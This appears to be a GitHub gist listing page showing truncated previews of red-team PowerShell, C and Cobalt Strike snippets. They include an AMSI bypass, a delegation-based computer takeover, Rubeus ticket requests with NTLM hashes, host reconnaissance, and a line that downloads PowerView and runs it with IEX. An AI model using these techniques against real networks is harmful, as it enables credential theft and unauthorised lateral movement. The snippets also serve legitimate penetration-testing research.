This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Ensure System.Security assembly is loaded. | |
Add-Type -AssemblyName System.Security | |
function ConvertTo-CIPolicy { | |
<# | |
.SYNOPSIS | |
Converts a binary file that contains a Code Integrity policy into XML format. | |
Author: Matthew Graeber (@mattifestation) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#ifndef PATCHLESS_AMSI_H | |
#define PATCHLESS_AMSI_H | |
#include <windows.h> | |
static const int AMSI_RESULT_CLEAN = 0; | |
PVOID g_amsiScanBufferPtr = nullptr; | |
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Results = ([adsisearcher]"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))").FindAll() | % { | |
$Entry = $_.GetDirectoryEntry() | |
$SAM = $Entry.samAccountName[0] | |
$DN = $Entry.distinguishedName[0] | |
try { | |
$Cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 @($Entry.userCertificate) | |
$Exp = $Cert.GetExpirationDateString() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@Library('ci-jenkins-common') _ | |
// Jenkins build pipeline (declarative) | |
// Project: Seatbelt | |
// URL: https://github.com/GhostPack/Seatbelt | |
// Author: @tifkin_/@harmj0y | |
// Pipeline Author: harmj0y | |
def gitURL = "https://github.com/GhostPack/Seatbelt" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# import the necessary toolsets | |
Import-Module .\powermad.ps1 | |
Import-Module .\powerview.ps1 | |
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
whoami | |
# the target computer object we're taking over | |
$TargetComputer = "primary.testlab.local" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##### IF ELEVATED: | |
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X) | |
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH | |
# decode the base64 blob to a binary .kirbi | |
$ base64 -d ticket.b64 > ticket.kirbi | |
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT) | |
beacon> make_token DOMAIN\USER PassWordDoesntMatter |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows version: | |
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | |
Users who have authed to the system: | |
ls C:\Users\ | |
System env variables: | |
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment | |
Saved outbound RDP connections: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function New-SYSVOLZip { | |
<# | |
.SYNOPSIS | |
Compresses all folders/files in SYSVOL to a .zip file. | |
Author: Will Schroeder (@harmj0y) | |
License: BSD 3-Clause | |
Required Dependencies: None |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add-Type -AssemblyName System.Security | |
$Content = (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1') | |
$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content) | |
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine) | |
IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine))) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
NewerOlder